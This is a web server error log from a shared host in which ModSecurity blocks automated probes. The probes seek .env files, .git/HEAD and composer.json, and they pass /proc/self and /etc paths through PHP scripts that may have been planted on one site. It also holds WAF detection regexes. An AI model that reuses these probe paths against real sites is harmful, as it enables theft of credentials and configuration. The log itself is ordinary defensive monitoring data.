[Mon May 11 15:50:23.753611 2026] [security2:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/config/app/.env"] [unique_id "agHen-SQ-m-m0ukSShuLBgAAAUk"]
[Mon May 11 15:50:23.754081 2026] [security2:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/config/app/.env"] [unique_id "agHen-SQ-m-m0ukSShuLBgAAAUk"]
[Mon May 11 15:50:23.754321 2026] [security2:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/config/app/.env"] [unique_id "agHen-SQ-m-m0ukSShuLBgAAAUk"]
[Mon May 11 15:50:23.857547 2026] [proxy_fcgi:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:50:23.954234 2026] [proxy_fcgi:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:50:24.049657 2026] [proxy_fcgi:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:50:24.145189 2026] [proxy_fcgi:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:50:24.246030 2026] [proxy_fcgi:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:50:24.342466 2026] [proxy_fcgi:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:50:24.440567 2026] [proxy_fcgi:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:50:24.637541 2026] [proxy_fcgi:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:50:24.733778 2026] [proxy_fcgi:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:50:25.515545 2026] [proxy_fcgi:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:50:25.611979 2026] [proxy_fcgi:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:50:25.716067 2026] [proxy_fcgi:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:50:25.812637 2026] [proxy_fcgi:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:50:25.913368 2026] [proxy_fcgi:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:50:26.009165 2026] [proxy_fcgi:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:50:34.821550 2026] [security2:error] [pid 1320398:tid 1320410] [client 79.137.64.41:44308] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /wp-content/plugins/nextgen-gallery/vendor/ezyang/htmlpurifier/composer.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/plugins/nextgen-gallery/vendor/ezyang/htmlpurifier/composer.json"] [unique_id "agHequJEyNRN152ArOSVMwAAAEo"]
[Mon May 11 15:50:34.821780 2026] [security2:error] [pid 1320398:tid 1320410] [client 79.137.64.41:44308] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/plugins/nextgen-gallery/vendor/ezyang/htmlpurifier/composer.json"] [unique_id "agHequJEyNRN152ArOSVMwAAAEo"]
[Mon May 11 15:50:34.822029 2026] [security2:error] [pid 1320398:tid 1320410] [client 79.137.64.41:44308] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/plugins/nextgen-gallery/vendor/ezyang/htmlpurifier/composer.json"] [unique_id "agHequJEyNRN152ArOSVMwAAAEo"]
[Mon May 11 15:50:42.091268 2026] [security2:error] [pid 1320398:tid 1320410] [client 79.137.64.41:44308] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /wp-content/plugins/nextgen-gallery/vendor/imagely/pope-framework/composer.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/plugins/nextgen-gallery/vendor/imagely/pope-framework/composer.json"] [unique_id "agHesuJEyNRN152ArOSVPQAAAEo"]
[Mon May 11 15:50:42.091534 2026] [security2:error] [pid 1320398:tid 1320410] [client 79.137.64.41:44308] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/plugins/nextgen-gallery/vendor/imagely/pope-framework/composer.json"] [unique_id "agHesuJEyNRN152ArOSVPQAAAEo"]
[Mon May 11 15:50:42.091765 2026] [security2:error] [pid 1320398:tid 1320410] [client 79.137.64.41:44308] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/plugins/nextgen-gallery/vendor/imagely/pope-framework/composer.json"] [unique_id "agHesuJEyNRN152ArOSVPQAAAEo"]
[Mon May 11 15:50:54.021127 2026] [security2:error] [pid 1320674:tid 1320692] [client 43.153.36.110:53986] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHevqO9RdIr1DwxYR2chAAAAMI"], referer: http://www.piregwan-genesis.com/liens/redirect.php?url=https://kiwimagickz7.com
[Mon May 11 15:52:15.320818 2026] [security2:error] [pid 1320398:tid 1320421] [client 52.70.209.13:16683] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:php echo BASEFRONT ?>forum/sujet.php?theme. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:php echo BASEFRONT ?>forum/sujet.php?theme: <?php echo $themeid ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agHfD-JEyNRN152ArOSVzgAAAFU"]
[Mon May 11 15:52:15.322207 2026] [security2:error] [pid 1320398:tid 1320421] [client 52.70.209.13:16683] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agHfD-JEyNRN152ArOSVzgAAAFU"]
[Mon May 11 15:52:15.407742 2026] [security2:error] [pid 1320398:tid 1320421] [client 52.70.209.13:16683] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: PHP Open Tag Found"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHfD-JEyNRN152ArOSVzgAAAFU"]
[Mon May 11 15:52:30.182721 2026] [security2:error] [pid 1319885:tid 1319912] [client 41.248.180.0:58674] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "manhattan-studio.fr"] [uri "/.git/HEAD"] [unique_id "agHfHlchVQ3tCn0m9OphUgAAAQ4"]
[Mon May 11 15:52:30.182959 2026] [security2:error] [pid 1319885:tid 1319912] [client 41.248.180.0:58674] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "manhattan-studio.fr"] [uri "/.git/HEAD"] [unique_id "agHfHlchVQ3tCn0m9OphUgAAAQ4"]
[Mon May 11 15:52:30.183221 2026] [security2:error] [pid 1319885:tid 1319912] [client 41.248.180.0:58674] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "manhattan-studio.fr"] [uri "/.git/HEAD"] [unique_id "agHfHlchVQ3tCn0m9OphUgAAAQ4"]
PHP Warning:  filesize(): stat failed for /proc/211/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/211/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/211/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/211/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/211/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/211/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 15:53:35.768174 2026] [security2:error] [pid 1319998:tid 1320002] [client 216.73.216.110:58061] ModSecurity: Warning. Matched phrase "proc/self/stat" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: proc/self/stat found within ARGS:filesrc: /proc/self/status"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHfX6t2WtvoFr7xvGzebgAAAII"]
[Mon May 11 15:53:35.768941 2026] [security2:error] [pid 1319998:tid 1320002] [client 216.73.216.110:58061] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHfX6t2WtvoFr7xvGzebgAAAII"]
[Mon May 11 15:53:35.857892 2026] [security2:error] [pid 1319998:tid 1320002] [client 216.73.216.110:58061] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHfX6t2WtvoFr7xvGzebgAAAII"]
[Mon May 11 15:53:45.712824 2026] [security2:error] [pid 1319998:tid 1320023] [client 216.73.216.110:59357] ModSecurity: Warning. Matched phrase "etc/exports" at ARGS:path. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/exports found within ARGS:path: /etc/exports.d"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHfaat2WtvoFr7xvGzeeQAAAJc"]
[Mon May 11 15:53:45.713321 2026] [security2:error] [pid 1319998:tid 1320023] [client 216.73.216.110:59357] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHfaat2WtvoFr7xvGzeeQAAAJc"]
[Mon May 11 15:53:45.768408 2026] [security2:error] [pid 1319998:tid 1320023] [client 216.73.216.110:59357] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHfaat2WtvoFr7xvGzeeQAAAJc"]
[Mon May 11 15:54:38.300314 2026] [security2:error] [pid 1319885:tid 1319932] [client 216.73.216.110:35341] ModSecurity: Warning. Matched phrase "proc/self/mounts" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: proc/self/mounts found within ARGS:filesrc: /proc/self/mounts"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHfnlchVQ3tCn0m9Oph9AAAARY"]
[Mon May 11 15:54:38.300969 2026] [security2:error] [pid 1319885:tid 1319932] [client 216.73.216.110:35341] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHfnlchVQ3tCn0m9Oph9AAAARY"]
[Mon May 11 15:54:38.392610 2026] [security2:error] [pid 1319885:tid 1319932] [client 216.73.216.110:35341] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHfnlchVQ3tCn0m9Oph9AAAARY"]
[Mon May 11 15:54:45.858306 2026] [:error] [pid 1320398:tid 1320418] [client 24.254.229.193:48812] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:55:05.718644 2026] [ssl:error] [pid 1319886:tid 1319911] (EAI 2)Name or service not known: [client 116.202.235.23:34860] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 15:55:05.718814 2026] [ssl:error] [pid 1319886:tid 1319911] AH01941: stapling_renew_response: responder error
[Mon May 11 15:55:05.768289 2026] [ssl:error] [pid 1319953:tid 1319972] (EAI 2)Name or service not known: [client 116.202.235.23:34866] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 15:55:05.768324 2026] [ssl:error] [pid 1319953:tid 1319972] AH01941: stapling_renew_response: responder error
[Mon May 11 15:55:05.819647 2026] [ssl:error] [pid 1319998:tid 1320023] (EAI 2)Name or service not known: [client 116.202.235.23:34878] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 15:55:05.819702 2026] [ssl:error] [pid 1319998:tid 1320023] AH01941: stapling_renew_response: responder error
[Mon May 11 15:55:05.868490 2026] [ssl:error] [pid 1320674:tid 1320712] (EAI 2)Name or service not known: [client 116.202.235.23:34886] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 15:55:05.868529 2026] [ssl:error] [pid 1320674:tid 1320712] AH01941: stapling_renew_response: responder error
[Mon May 11 15:55:08.347687 2026] [:error] [pid 1319885:tid 1319920] [client 103.216.221.100:9138] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:56:00.880063 2026] [authz_core:error] [pid 1319885:tid 1319889] [client 216.73.216.110:44349] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/cocur/slugify/tests/error_log
[Mon May 11 15:56:06.610373 2026] [authz_core:error] [pid 1319885:tid 1319889] [client 216.73.216.110:44349] AH01630: client denied by server configuration: /home/missmand/public_html/learning/old/main/inc/entity/repository/error_log
[Mon May 11 15:56:32.471357 2026] [:error] [pid 1320398:tid 1320416] [client 103.69.149.45:58056] File does not exist: /home/ofcrysta/public_html/wp-login.php
[Mon May 11 15:56:58.756381 2026] [security2:error] [pid 1320674:tid 1320706] [client 176.65.139.168:57296] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHgKqO9RdIr1DwxYR2d-QAAANE"]
[Mon May 11 15:56:58.756723 2026] [security2:error] [pid 1320674:tid 1320706] [client 176.65.139.168:57296] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHgKqO9RdIr1DwxYR2d-QAAANE"]
[Mon May 11 15:56:59.966069 2026] [security2:error] [pid 1320674:tid 1320706] [client 176.65.139.168:57296] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHgKqO9RdIr1DwxYR2d-QAAANE"]
[Mon May 11 15:57:11.031864 2026] [core:error] [pid 1319998:tid 1320018] [client 44.242.167.95:36970] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 15:57:11.031898 2026] [core:error] [pid 1319998:tid 1320018] [client 44.242.167.95:36970] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 15:57:11.507689 2026] [autoindex:error] [pid 1320674:tid 1320703] [client 44.242.167.95:36972] AH01276: Cannot serve directory /home/totalcloud/public_html/sitebuilder/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 15:57:11.511043 2026] [core:error] [pid 1320674:tid 1320703] [client 44.242.167.95:36972] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 15:57:12.160808 2026] [:error] [pid 1320398:tid 1320415] [client 82.38.180.2:57870] File does not exist: /home/piregwan/public_html/journal_post.php
[Mon May 11 15:57:42.144879 2026] [core:error] [pid 1319885:tid 1319903] [client 74.7.230.8:57844] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 15:57:42.144994 2026] [core:error] [pid 1319885:tid 1319903] [client 74.7.230.8:57844] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
